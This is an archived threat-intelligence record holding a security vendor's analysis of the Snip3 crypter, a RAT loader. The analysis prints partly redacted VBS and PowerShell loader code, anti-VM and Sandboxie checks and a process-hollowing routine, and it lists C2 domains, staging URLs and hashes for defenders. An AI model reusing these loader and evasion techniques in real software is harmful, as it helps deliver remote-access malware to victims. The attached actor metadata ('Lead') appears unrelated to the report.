{
	"id": "a6ddee7e-25ea-43cb-b860-70330779a0f0",
	"created_at": "2026-04-06T00:09:05.811686Z",
	"updated_at": "2026-04-10T03:23:51.065862Z",
	"deleted_at": null,
	"sha1_hash": "3d86ca0f5ee2c6944e65a4e5f56a7f39d96c9565",
	"title": "Revealing the Snip3 Crypter, a Highly Evasive RAT Loader",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 864093,
	"plain_text": "Revealing the Snip3 Crypter, a Highly Evasive RAT Loader\r\nBy Nadav Lorber\r\nArchived: 2026-04-05 12:40:22 UTC\r\nMorphisec has recently monitored a highly sophisticated Crypter-as-a-Service that delivers numerous RAT families onto\r\ntarget machines.\r\nThe Crypter is most commonly delivered through phishing emails, which lead to the download of a visual basic file. In some\r\ncases, however, the attack chain starts with a large install file, such as an Adobe installer, which bundles the next stage. \r\nThis Crypter implements several advanced techniques to bypass detection, such as: \r\nExecuting PowerShell code with the ‘remotesigned’ parameter\r\nValidating the existence of Windows Sandbox and VMWare virtualization\r\nUsing Pastebin and top4top for staging\r\nCompiling RunPE loaders on the endpoint at runtime\r\nWe have named the Snip3 Crypter based on the common denominator username taken from the PDB indicator we found in\r\nan earlier variant.\r\nSnip3 Crypter Technical Details\r\nFigure 1 – The summarized execution flow\r\nWe classified this Crypter activity based on the following execution flow shown in Figure 1. This Crypter activity was first\r\nobserved in the wild on February 4, 2021, and is still ongoing.\r\nThe related variant’s first submissions on VirusTotal demonstrate its evasive nature, as few security solutions were able to\r\ndetect it.\r\nThe First Stage: VB Script\r\nThe first stage of the attack chain is a VB Script that’s designed to load and then move the execution to the second-stage\r\nPowerShell script. We’ve identified four versions containing 11 sub-versions in this initial loader stage, with the main\r\ndifference between the four being the second-stage PowerShell loading mechanism. The main difference between the 11\r\nsub-versions is the type of obfuscation that each uses. 
\r\nAn interesting and unique technique here is that the script executes the PowerShell script with a -RemoteSigned parameter\r\nalong with the script as a command.\r\nVersion 1 (Seen February 4, 2021 – February 24, 2021)\r\nThis version initially decodes a PowerShell script that is executed in order to download, save, and execute the second stage\r\nPowerShell script.\r\nOnErrorResumeNext\r\nDimWSC, QwErUnBcZsAyOpLmHg\r\nQwErUnBcZsAyOpLmHg =\"POWERSHELL -EXECUTIONPOLICY REMOTESIGNED -COMMAND \"\r\nWSC =cHr(119)'Deducted, decodes to wSCrIpT.sHELl\r\nSetInBvCzAsKlOpIgHbCzAquJHyt =CreateObject(WSC)\r\nDimPlMbCdQwwTyHbZaHNbVfTH\r\nPlMbCdQwwTyHbZaHNbVfTH =cHr(73)'Deducted, decodes to PowerShell script in decimal\r\nWScript.Sleep1000\r\nInBvCzAsKlOpIgHbCzAquJHyt.RUn QwErUnBcZsAyOpLmHg \u0026 PlMbCdQwwTyHbZaHNbVfTH,0\r\nCode Block 1\r\nThe second stage PowerShell is downloaded from top4top.io, an Egyptian file hosting service. Once the second stage is\r\ndownloaded, the script executes it and saves it under ..\\AppData\\Local\\Temp\\SystemSecurity32.PS1.\r\nFigure 2 – Decoded stage 1 PowerShell\r\nNote that this PowerShell executes with the RemoteSigned parameter although the second stage executes with the Bypass\r\nparameter. This greatly decreases the efficiency of the technique; further, the bypass is no longer used starting from version 2.\r\nhttps://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader\r\nPage 1 of 8\n\nAdditionally, we have observed a couple of different sub-versions for this script. These sub-versions differ in their\r\nobfuscation technique (the following example is one of them).\r\nVersion 2 (Seen 01 March 2021 – 29 March 2021)\r\nThis version contains the second stage PowerShell embedded as a string within the VBS. \r\nThe following string is decoded by an XOR function with an embedded key. This embedded key differs between each\r\nscript. 
\r\nPrivateFunctionvQ(Inp, Key, Mode)\r\n Dimz, i, Position, cptZahl, orgZahl, keyZahl, cptString\r\n Fori =1TolEn(Inp)\r\n    Position = Position +1\r\n   IfPosition \u003elEn(Key)ThenPosition =1\r\n    keyZahl =aSc(Mid(Key, Position,1))\r\n   IfModeThen\r\n      orgZahl =aSc(Mid(Inp, i,1))\r\n      cptZahl = orgZahlXorkeyZahl\r\n      cptString =hEx(cptZahl)\r\n     IflEn(cptString) \u003c2ThencptString =\"0\"\u0026 cptString       z = z \u0026 cptString    Else\r\n     Ifi \u003elEn(Inp) \\2ThenExitFor\r\n      cptZahl =CByte(\"\u0026\"\u0026\"H\"\u0026Mid(Inp, i *2-1,2))\r\n      orgZahl = cptZahlXorkeyZahl\r\n      z = z \u0026cHR(orgZahl)\r\n   EndIf\r\n Next\r\n  vQ = z\r\nEndFunction\r\n'Deducted code\r\nMyFile.WriteLine(REPLACE(vQ(AqUhNbgAqwpMb,\"[deducted key]\",False),\"%VBS%\", wscript.SCRIPTFULLNAME))\r\nCode Block 2\r\nOnce the string is decoded, the script replaces the place-holder %VBS% within the decoded PowerShell with the script path\r\nand saves it to the ..\\AppData\\Local\\Temp folder before the execution. 
Note that since the mentioned place-holder populates\r\na path containing the username in the PowerShell script, the PowerShell hash differs from victim to victim.\r\nDimSH\r\nSH =cHR(80+7) \u0026cHR(100+15) \u0026cHR(66+1) \u0026cHR(80+2) \u0026cHR(110-5) \u0026cHR(85-5) \u0026cHR(80+4)\r\n\u0026cHR(40+6) \u0026cHR(230/2) \u0026cHR(362) \u0026cHR(60+9) \u0026cHR(100+8) \u0026cHR(70+6) SetWS =CreateObject(SH)\r\nSetFSO =CreateObject(\"Scripting.FileSystemObject\") SetMyFile = FSO.CreateTextFile(FSO.GetSpecialFolder(2)\r\n+\"\\OS64Bits.PS1\",True) MyFile.WriteLine(rEPlAcE(vQ(AqUhNbgAqwpMb,\"mp1Z{RfTJ#SXV:[1c_R%5s_@W8GKbm?KK1*\r\n[bc;QVRMCjodq.#~aFWsAf2SQ-ChVd\u0026\",False),\"%VBS%\", wscript.SCRIPTFULLNAME))\r\nMyFile.Close\r\nWS.rUN\"POWERSHELL -eXEcUTiONpOLicY rEmOtEsIgNeD -FILE \"\u0026 FSO.GetSpecialFolder(2) +\"\\OS64Bits.PS1\",0\r\nCode Block 3\r\nThe following table describes the different sub-versions that we have observed:\r\nSeen Dates Powershell Name Obfuscation changes\r\n02 March 2021 WinUpdater32.PS1 Observed only PowerShell agent as payload\r\n01 March 2021 – 19 March 2021 OS64Bits.PS1 Embedded PowerShell as Hex in string\r\n09 March 2021 – 10 March 2021 OS64Bits.PS1 Added junk Chinese characters to a string\r\n10 March 2021 – 23 March 2021 Systray64.PS1 Chinese characters replaced with ‘$@#’\r\n29 March 2021 Systray64.PS1 Added another layer for XOR decoding\r\nVersion 3 (Seen April 8, 2021 – April 20, 2021)\r\nThis version is quite similar to Version 1, except that the decoded PowerShell script now uses the pastebin.com service to\r\ndownload the second stage PowerShell. This script saves that\r\nsecond stage under ..\\AppData\\Local\\Temp\\SysTray.PS1 and also creates a VBS within the victim’s startup folder that\r\nexecutes it to maintain persistence. 
Here, we have also observed a couple of sub-versions that differ by their obfuscation\r\nincluding different encoding and junk comments.\r\nsnip3_code_2\r\nFigure 3 – Pastebin stage 1 PowerShell\r\nVersion 4 (Seen April 26, 2021 – April 30, 2021)\r\nThis version is very similar to Version 3, except that the author replaced the obfuscation techniques in an attempt to discard\r\nknown IoC’s from the previous version to avoid detection. Here are a few examples of how:\r\nDifferent names for the VBS variables\r\nSaves and executes a BAT script that contains the PowerShell shown in Version 3\r\nUtilizing GetObject instead of CreateObject for retrieving the Shell object, which is a nice way to break the attack\r\nchain\r\nAdditional sub-version implemented a decryption function for the PowerShell loader within the BAT\r\nDimBAT\r\nBAT =\"Powershell -WindowStyle Hidden -Command 'IEX\r\n([System.Text.Encoding]::UTF8.GetString(@(35,82,101)))'\"'Deducted PowerShell loader\r\nSetfso =CreateObject(\"Scripting.FileSystemObject\")\r\nSetShellEX =GetObject(\"new:13709620-C279-11CE-A49E-444553540000\")\r\nDimTEMPO\r\nTEMPO = fso.getspecialfolder(2) \u0026\"\\1.bat\"\r\nSetMyFile = fso.CreateTextFile(TEMPO,True)\r\nMyFile.WriteLine(Replace(BAT,\"'\",\"\"\"\"))\r\nMyFile.Close\r\nShellEX.SHELLEXECUTE TEMPO,\"\",\"\",\"\",0\r\nCode Block 4\r\nThe Second Stage: PowerShell Script\r\nThe second stage’s PowerShell script is similar to all of the above VBS versions (with minor modifications), and seems to be\r\ndynamic based on the Crypter’s configuration.\r\nThe two main purposes of this stage are to detect virtual environments and enact a reflective load of RunPE to execute the\r\nRAT payload within a hollowed Windows process.\r\nVirtual Machine and Sandboxie Evasions\r\nIf configured by the user (adversary), the PowerShell implements functions that attempt to detect if the script is executed\r\nwithin Microsoft Sandbox, VMWare, VirtualBox, or Sandboxie environments. 
If the script identifies one of those virtual\r\nmachine environments, the script terminates without loading the RAT payload.\r\nNote that the author used extra measures to detect a virtual environment since the Anti-VM code that is usually seen in the\r\nwild does not detect Microsoft Sandbox (a feature introduced by Microsoft two years ago). \r\nTo detect Windows Sandbox, VMWare, or VirtualBox the script extracts the Manufacturer string and compares it to one of\r\nthe hardcoded strings. This is done by querying for a WMI class named Win32_ComputerSystem utilizing\r\nthe ManagementObjectSearcher class.\r\nFunctionVirtualMachineDetector() {\r\n$searcher= (New-ObjectSystem.Management.ManagementObjectSearcher((Binary2String(\",.,.[deducted]\")))#\r\nDeducted. decodes to ‘Select * from Win32_ComputerSystem’\r\n$items=$searcher.Get()\r\n$Tr=\"\"\r\nforeach($itemin$items) {\r\n[String]$manufacturer=$item[\"Manufacturer\"].ToString().ToLower()\r\nif(($manufacturer-eq\"microsoft corporation\"-\r\nand$item[\"Model\"].ToString().ToUpperInvariant().Contains(\"VIRTUAL\")) -or$manufacturer.Contains(\"vmware\") -\r\nor$item[\"Model\"].ToString() -eq\"VirtualBox\") {\r\n$Tr=\"True\"\r\n}\r\nelse{\r\n$Tr=\"False\"\r\n}\r\n}\r\nreturn$Tr\r\n}\r\nCode Block 5\r\nTo detect a Sandboxie environment, the script tries to resolve a handle to a DLL named SbieDll.dll.\r\nFunction DetectSandboxie() {\r\n[Int32] $i = ModuleHandle((Binary2String(\",.,[deducted]\"))) # Deducted. resolves to SbieDll.dll\r\n[String] $s = \"\"\r\nif ($i -eq 0) {\r\n$s = \"False\"\r\n} else {\r\n$s = \"True\"\r\n}\r\nreturn $s\r\n}\r\nCode Block 6\r\nExecuting the RAT\r\nThese days most of the RAT loaders embed or download an obfuscated, compiled code to inject a payload into a running\r\nprocess. In this case, however, the author embedded a compressed (GZIP) source code for this operation. 
This code is\r\ncompiled in runtime.\r\nThe source code used here is a modified version of the RunPE from the NYAN-x-CAT GitHub repository\r\n(hxxps://github[.]com/NYAN-x-CAT/CSharp-RunPE/blob/master/RunPE/RunPE.cs).\r\nBy using this technique, the author introduces an additional stealthy evasion mechanism.\r\nOnce the script is done compiling the RunPE code, the PowerShell loads and executes it along with the RAT payload and the\r\nexecutable path to hollow for injecting the payload. Most of this stage’s PowerShells are configured to\r\nhollow InstallUtil.exe, although some of them are configured to hollow RegSvcs.exe.\r\nfunction CodeDom([Byte[]] $BB, [String] $TP, [String] $MT) { # BB = Compressed RunPE source code, $TP =\r\nNamespace and Class in RunPE, $MT = Method to execute in RunPE\r\n$dictionary = new-object 'System.Collections.Generic.Dictionary[[string],[string]]'\r\n$dictionary.Add((Binary2String(\",.,,[deducted]\".Replace(\",\", \"0\").Replace(\".\", \"1\"))),\r\n(Binary2String(\"01110[deducted]\"))) # Deducted binary encoded strings\r\n$CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)\r\n$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters\r\n$CompilerParametres.ReferencedAssemblies.Add((Binary2String('010100[deducted]'))) # Deducted binary encoded\r\nstrings\r\n$CompilerParametres.ReferencedAssemblies.Add((Binary2String('010100[deducted]'))) # Deducted binary encoded\r\nstrings\r\n$CompilerParametres.ReferencedAssemblies.Add((Binary2String('010100[deducted]'))) # Deducted binary encoded\r\nstrings\r\n$CompilerParametres.ReferencedAssemblies.Add((Binary2String('011011[deducted]'))) # Deducted binary encoded\r\nstrings\r\n$CompilerParametres.ReferencedAssemblies.Add((Binary2String('010011[deducted]'))) # Deducted binary encoded\r\nstrings\r\n$CompilerParametres.IncludeDebugInformation = $false\r\n$CompilerParametres.GenerateExecutable = $false\r\n$CompilerParametres.GenerateInMemory = 
$true\r\n$CompilerParametres.CompilerOptions += (Binary2String(\"0010111001111001[deducted\")) # Deducted binary encoded\r\nstrings\r\n$BB = Decompress($BB) # Compressed RunPE source code\r\n[Type] $T = $CompilerResults.CompiledAssembly.GetType($TP)\r\n[Byte[]] $Bytes = Decompress(@(31,139,8,0,0)) # Deducted decimal compressed bytes (compressed payload)\r\ntry {\r\n[Object[]] $Params=@($MyPt.Replace(\"Framework64\",\"Framework\") ,$Bytes)\r\nreturn $T.GetMethod($MT).Invoke($null, $Params)\r\n} catch { }\r\n}\r\nCode Block 7\r\nThe Third Stage: RAT Payloads\r\nThe final payload, chosen by the user, is eventually executed within the hollowed process memory. Our analysis has mostly\r\nseen either ASyncRAT or RevengeRAT, which often come from an open-source RAT platform originally available through\r\nthe NYANxCAT Github repository (hxxps://github[.]com/NYAN-x-CAT). Note that we have also discovered the same pattern\r\nof utilizing RATs from that repository in Tracking HCrypt: An Active Crypter as a Service.\r\nIn addition, we also identified one variant that used Agent Tesla and another one that used NetWire RAT.\r\nFigure 4 – AsyncRAT Panel\r\nFingerprinting the Crypter’s Users (Actors) \r\nVB Script Campaigns\r\nThe following table emphasizes the different versions and IOCs that were used within the variants we observed.\r\n1st Stage Version | RAT Version | C2 Used\r\nV1 (4 different sub-versions), V2 (3 different sub-versions), V3 (2 different sub-versions) | AsyncRAT 0.5.7B | asin8989.ddns[.]net, asin8988.ddns[.]net, asin8990.ddns[.]net\r\nV3 (3 different sub-versions), V4 | AsyncRAT 0.5.7B | adobe.myactivedirectory[.]com, loading8992.bounceme[.]net\r\nV1 (4 different sub-versions), V2 (2 different sub-versions), V3 (3 different sub-versions), V4 (2 different sub-versions) | AsyncRAT 0.5.7B, RevengeRAT | h0pe1759.ddns[.]net\r\nV1, V2 (4 different sub-versions), V3 (3 different sub-versions), V4 (2 different sub-versions) | RevengeRAT | kimjoy.ddns[.]net, kimjoy007.dyndns[.]org\r\nV2 | Agent Tesla | SMTP mail.alamdarhardware[.]com (sharjah@alamdarhardware[.]com)\r\nThe following table correlates the first-stage VBS names used by the actors. Most of them relate to shipping, flights,\r\nand business activities.\r\nActor (by C2) | VBS Names\r\nh0pe1759.ddns[.]net | Signed Flight Confirmation – 017267.vbs, Please_DocuSign_UNITYJETS.vbs, Fli Details.vbs, Trip Details.vbs, N640SW Workscope Details.vbs, Cargo Flight Details Dimension and Packing List Details.vbs, Updated Passenger Trip Sheet.vbs, 86735 Presentation Details.vbs, Flight Quote_7634516_SuperMid.vbs, Flight Routing Details.vbs, Minutes Airbus Reliability 23-04-2021.vbs, Routing Details.vbs, Airbus Worldwide Symposium.vbs, Airbus Family Webinar Invitation Details.vbs\r\nkimjoy.ddns[.]net, kimjoy007.dyndns[.]org | Signed contract.vbs, Flight Details.vbs, Cargo Trip Detail.vbs, General Cargo Detail 2021 (Trip itinerary).pdf.vbs, Charter Details.vbs, Same Day Round-15PAX _Trip Details.vbs, Trip itinerary Details.pdf.vbs, 863354765-2021 Presentation Details.vb, Request Option 2 Details.vbs, ACMI Cargo Details.xlsx.vbs\r\nAdobe.myactivedirectory[.]com, loading8992.bounceme[.]net | Rfq 507890_pdf.vbs, PN RD 56098.pdf.vbs, RFQ_115A087_202104_20_Urgent_pdf.vbs, As_4509_pdf_3BPCL (2).vbs\r\nAdditionally, the following tweet https://twitter.com/Unit42_Intel/status/1382729698791284736 from Unit42 is an example\r\nof one of the delivery techniques.\r\nNetWire RAT Embedded in Decoy Installers\r\nWe identified four different decoy installers between March 19, 2021 and March 22, 2021 that delivered Version 1 of the\r\nfirst stage. 
All of those variants request the second-stage PowerShell script from the same URL hosted on top4top[.]io,\r\nwhich delivers NetWire RAT. The following table covers the relevant IOCs.\r\nIOC | Description\r\n8add26475180ebd54629b71ba6215ca9b325afb224f9efab4affa885468f2e89 | Installer decoy (Adobe Installer)\r\na2ae35821b702b7b0fd434a54afa836e69c20904664ce1ed4d3181ba2b8aa051 | Installer decoy (Advanced System Repair)\r\n0c66bceb98feec7df1330747aa58ab43912f761bae263ed1c30cf17301da6d12 | Installer decoy (DVDFab downloader)\r\n17f4e321b80d36a9235c8f8ca6794a07dd1634bb50ae1a745d28bad014869173 | Installer decoy (Movavi Video Converter)\r\nhxxps://i.top4top[.]io/m_1891i29ay1.mp4 | 2nd stage PowerShell URL\r\nalice2019.myftp[.]biz | NetWire RAT C2\r\nFingerprinting the Crypter’s Author \r\nSince the author tends to change the code patterns and did a good job avoiding the usage of unique artifacts, it’s almost\r\nimpossible to correlate this activity with anything else.\r\nThe unique artifact that we found is the RunPE source code’s namespace and class names – ProjFUD.PA.\r\nThe following string assisted us with discovering what we believe is one of the authors’ earlier variants that contains the\r\nexact RunPE code. However, in this case, it’s embedded as a precompiled DLL. This scavenge provided us with the\r\nfollowing PDB string from the DLL:\r\nC:\\Users\\Snip3\\OneDrive\\Bureau\\Sparta Project\\projFUD\\projFUD\\obj\\Debug\\projFUD.pdb\r\nWith the following PDB string, we discovered additional variants that we believe are from the same author due to repeating\r\npatterns within the code flow. 
Here are a few examples:\r\nC:\\Users\\Snip3\\source\\repos\\CSClipper\\CSClipper\\obj\\Debug\\CSClipper.pdb\r\nC:\\Users\\Snip3\\source\\repos\\Startup\\Startup\\obj\\Debug\\fdgerttry.p\r\nCrypter v4\\Deep Crypter v4\\obj\\Debug\\Deep Crypter v4.pdb\r\nC:\\Users\\Snip3\\source\\repos\\Mozilla\\Mozilla\\obj\\Debug\\Mozilla.pdb\r\nFurther investigation led to a personal identity that we strongly believe is the author of these malicious activities. \r\nConclusion\r\nThe Snip3 Crypter’s ability to identify sandboxing and virtual environments makes it especially capable of bypassing\r\ndetection-centric solutions. As a result, organizations with detection-focused stacks need to be wary of attacks like Snip3 and\r\nothers. Morphisec customers can rest easy that they are protected against the evasive techniques Snip3 and other attacks like\r\nit employ. \r\nSee Morphisec AMTD in action — book a demo today.\r\nIOCs\r\nFirst Stage .VBS Hashes\r\n64afcb90ecba8af5124dd17d3486da7e40010641ee016fece0f3edf08e24e372\r\nac4f554d93627a4b00821177189b2dcf245daa5740e507a459487c5a5aaf7a16\r\n3afff943\r\nSecond Stage PowerShell Hashes (Version 2 omitted because of its dynamic path)\r\na46f4721441cbabed3a8dc3be2a63cc7820d619ee8e612923d19f4b418a48302\r\n00381ab5055eadf6e2e3d3b54519b2fad6b70354c3e7efc44a3dc81c80357228\r\n61b335f2\r\nSecond stage PowerShell Delivering URLs\r\nhxxps://pastebin[.]com/raw/JjwexYss\r\nhxxps://pastebin[.]com/raw/esCeQbKu\r\nhxxps://pastebin[.]com/raw/1grXhFpU\r\nhxxps://pastebin[.]com/raw/Y61u\r\nBAT Script Hashes (Used in VBS Version 4)\r\n52ec383c880523d12cec868c201e643e05ad817625527dbcb9be53f6c36b202b\r\nd6d712cf32ddc695d1b79d888960e18f1134f2009fe43833da5f3b1a84651a99\r\n6e6c0278\r\nRAT Payload Hashes\r\n23d4837df84a76f96c674581c96e6a1729bac2981787d3b36ac5149d861f13e5\r\naefeb07afc0d9f4d09ab09317db14edef1b58df175f70cf6ea88d7f6cdce8cfc\r\nd452cee9\r\nRAT C2 Domains\r\nadobe.myactivedirectory[.]com\r\nloading8992.bounceme[.]net\r\nasin8989.ddns[.]net\r\nasin8988.ddns[.]net\r\nasin8990.ddns[.]net\r\nhousecommand.duckdns[.]org\r\nkingslanddomain.ddns[.]net\r\nh0pe1759.ddns[.]net\r\nkimjoy.ddns[.]net\r\nkimjoy007.dyndns[.]org\r\nn0ahark2021.ddns[.]net\r\nbodmas01.zapto[.]org\r\nbuiltx.ddns[.]net\r\nsharjah@alamdarhardware[.]com\r\nalice2019.myftp[.]biz\r\nfranco.ddns[.]net\r\nRelated variants from hunting for the PDB path\r\n74b35b4efbb35be941747e075989cca934ddf075a27d2ed84c55ac018190f207\r\n1162f338d95149e78b06479cbf8434ad5dfe0ef42913be4ccd2237f6425d1551\r\nf65d048d\r\nAbout the author\r\nNadav Lorber\r\nSecurity Research Tech Lead\r\nNadav Lorber is a leader on Morphisec’s cutting-edge threat research team. He began his career in threat intelligence in\r\n2013, where he was a SOC Specialist for the Israeli government’s military intelligence department. Since joining Morphisec,\r\nNadav has helped uncover key insights on topics like Jupyter Infostealer, Log4j, and the Snip3 crypter.\r\nSource: https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader"
	],
	"report_names": [
		"revealing-the-snip3-crypter-a-highly-evasive-rat-loader"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434145,
	"ts_updated_at": 1775791431,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3d86ca0f5ee2c6944e65a4e5f56a7f39d96c9565.pdf",
		"text": "https://archive.orkl.eu/3d86ca0f5ee2c6944e65a4e5f56a7f39d96c9565.txt",
		"img": "https://archive.orkl.eu/3d86ca0f5ee2c6944e65a4e5f56a7f39d96c9565.jpg"
	}
}